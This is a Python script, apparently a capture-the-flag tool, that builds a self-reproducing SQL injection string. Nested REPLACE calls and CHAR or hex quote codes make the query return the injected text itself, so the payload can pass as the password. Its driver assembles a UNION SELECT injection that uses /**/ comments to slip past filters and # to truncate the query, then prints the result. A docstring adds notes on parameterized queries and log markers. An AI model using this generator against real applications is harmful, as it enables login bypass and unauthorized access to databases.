Qunie构造脚本(payload==password).py
# replace_S = REPLACE(REPLACE('replace_A',CHAR(34),CHAR(39)),<encoded replace_B>,'replace_A')
# replace_A = REPLACE(REPLACE("replace_B",CHAR(34),CHAR(39)),<encoded replace_B>,"replace_B")
class rep:
    """Expand a SQL template into a nested, self-embedding REPLACE expression.

    The template held in ``replace_S`` carries a ``REPLACE_BASE`` marker.
    ``reppay`` expands that marker into two nested ``REPLACE(...)`` calls and
    then embeds a double-quoted copy of the expanded text inside itself.
    Judging by the file title (payload==password) the goal is a string whose
    SQL evaluation reproduces the string itself; nothing in this class
    executes SQL, it only performs text substitution and prints the result.

    Review note: a string of this shape has an effect only where request
    input is concatenated into SQL text; a parameterized query binds the
    whole value as data. Nested REPLACE calls together with CHAR(34)/CHAR(39)
    (or 0x22/0x27) inside a single request parameter are a distinctive
    marker for input filtering and log review.
    """

    # Template containing the REPLACE_BASE marker; reppay() overwrites it
    # with the expanded form.
    replace_S = ""
    # Double-quoted twin of the expanded template, derived by reppay().
    replace_A = ""
    # Placeholder character; it is passed to ord(), so it must be exactly
    # one character long.
    replace_B = ""
    # Encoding style for character codes: "CHAR", "CHR" or "0x", compared
    # case-insensitively; the caller's spelling is copied into the output.
    replace_charfuc = ""
    # Final assembled string, set by reppay().
    result = ""

    def reppay(self):
        """Build ``self.result`` from the configured template and print it.

        Side effects: overwrites ``self.replace_S``, ``self.replace_A`` and
        ``self.result``, and prints the intermediate and final strings.
        Calls ``exit("ERROR replace_charfuc")`` when ``replace_charfuc`` is
        not one of the supported styles; that check runs only after the
        intermediate strings have been printed.
        """
        # Expand the marker in two steps; the second step fills the
        # "replace_temp" slot that the first step introduced.
        expanded = self.replace_S.replace(
            "REPLACE_BASE", "REPLACE(replace_temp,char_B,'replace_A')"
        )
        expanded = expanded.replace(
            "replace_temp", "REPLACE('replace_A',tempchar_a,tempchar_b)"
        )
        self.replace_S = expanded

        # Same text with single quotes turned into double quotes and the
        # inner placeholder renamed, so it can sit inside single quotes.
        self.replace_A = expanded.replace("'", '"').replace("replace_A", "replace_B")

        rule = "-" * 20
        print(rule)
        for label in ("replace_S", "replace_A", "replace_B"):
            print(label + " is " + getattr(self, label))
        print(rule)

        # Embed the double-quoted twin, then drop in the placeholder character.
        self.result = self.replace_S.replace("replace_A", self.replace_A).replace(
            "replace_B", self.replace_B
        )

        func = self.replace_charfuc
        style = func.lower()
        if style in ("char", "chr"):
            # Function-call form: CHAR(n) / CHR(n) with decimal codes.
            code_b = func + "(" + str(ord(self.replace_B)) + ")"
            dquote_code = func + "(34)"
            squote_code = func + "(39)"
        elif style == "0x":
            # Hex-literal form: the prefix followed by the hex code.
            code_b = func + format(ord(self.replace_B), "x")
            dquote_code = func + "22"
            squote_code = func + "27"
        else:
            exit("ERROR replace_charfuc")

        self.result = (
            self.result.replace("char_B", code_b)
            .replace("tempchar_a", dquote_code)
            .replace("tempchar_b", squote_code)
        )
        print("payload is\n")
        print(self.result)
# Driver: configure one builder instance and print the assembled string.
payload = rep()

# Template to expand; write REPLACE_BASE where the REPLACE(...) part belongs.
payload.replace_S = "'/**/union/**/select/**/REPLACE_BASE#"

# Placeholder character used during substitution; must be exactly one character.
payload.replace_B = "B"

# How character codes are written: 0x, CHAR or CHR (any letter case).
payload.replace_charfuc = "0x"

payload.reppay()